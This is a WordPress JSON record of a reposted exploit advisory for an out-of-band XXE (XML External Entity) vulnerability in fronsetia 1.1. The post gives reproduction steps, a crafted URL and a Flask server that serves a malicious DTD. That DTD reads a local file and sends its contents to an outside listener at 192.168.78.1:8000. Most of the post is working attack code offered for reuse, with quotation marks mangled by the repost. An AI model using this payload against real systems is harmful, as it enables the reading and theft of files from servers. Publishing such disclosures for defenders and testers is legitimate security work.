{"id":60446,"date":"2024-11-23T00:22:18","date_gmt":"2024-11-22T21:22:18","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/182763\/fronsetia11-xml.txt"},"modified":"2024-11-23T00:22:18","modified_gmt":"2024-11-22T21:22:18","slug":"fronsetia-1-1-xml-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/fronsetia-1-1-xml-injection\/","title":{"rendered":"fronsetia 1.1 XML Injection"},"content":{"rendered":"

# Exploit Title: XXE OOB – fronsetiav1.1
# Date: 11\/2024
# Exploit Author: Andrey Stoykov
# Version: 1.1
# Tested on: Debian 12
# Blog:
https:\/\/msecureltd.blogspot.com\/2024\/11\/friday-fun-pentest-series-15-oob-xxe.html<\/p>\n

XXE OOB<\/p>\n

Description:<\/p>\n

– It was found that the application was vulnerable XXE (XML External Entity
Injection)<\/p>\n

Steps to Reproduce:<\/p>\n

1. Add Python3 server to serve malicious XXE payload
2. Add a file on the file system to be read via the application XXE payload
echo 123123 > \/tmp\/123
3. Enter the following URL as input
http:\/\/192.168.78.128:8080\/fronsetia\/show_operations.jsp?Fronsetia_WSDL=http:\/\/192.168.78.1:10000\/testxxeService?wsdl<\/p>\n

\/\/ Python Server Code<\/p>\n

from flask import Flask, Response, request
import logging<\/p>\n

app = Flask(__name__)<\/p>\n

# Set up logging
logging.basicConfig(level=logging.DEBUG)<\/p>\n

@app.route(‘\/testxxeService’, defaults={‘path’: ”})
def catch_all(path):
app.logger.debug(“Serving XXE payload”)
xml = “””<?xml version=”1.0″ encoding=”UTF-8”?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM “http:\/\/ 192.168.78.1:10000\/data.dtd”> %dtd;
]>
<data>&send;<\/data>”””
return Response(xml, mimetype=’text\/xml’, status=200)<\/p>\n

@app.route(‘\/data.dtd’, defaults={‘path’: ”})
def hello(path):
app.logger.debug(“DTD requested”)
xml = “””<!ENTITY % file SYSTEM “file:\/\/\/tmp\/123”>
<!ENTITY % eval “<!ENTITY % exfil SYSTEM ‘
http:\/\/192.168.78.1:8000\/?content=%file;’>”>
%eval;
%exfil;”””
return Response(xml, mimetype=’text\/xml’, status=200)<\/p>\n

if __name__ == “__main__”:
app.run(host=’0.0.0.0′, port=10000)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: XXE OOB – fronsetiav1.1# Date: 11\/2024# Exploit Author: Andrey Stoykov# Version: 1.1# Tested on: Debian 12# Blog:https:\/\/msecureltd.blogspot.com\/2024\/11\/friday-fun-pentest-series-15-oob-xxe.html XXE OOB Description: – It was found that the application was vulnerable XXE (XML External EntityInjection) Steps to Reproduce: 1. Add Python3 server to serve malicious XXE payload2. Add a file on the file system …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-60446","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60446","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=60446"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60446\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=60446"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=60446"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=60446"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}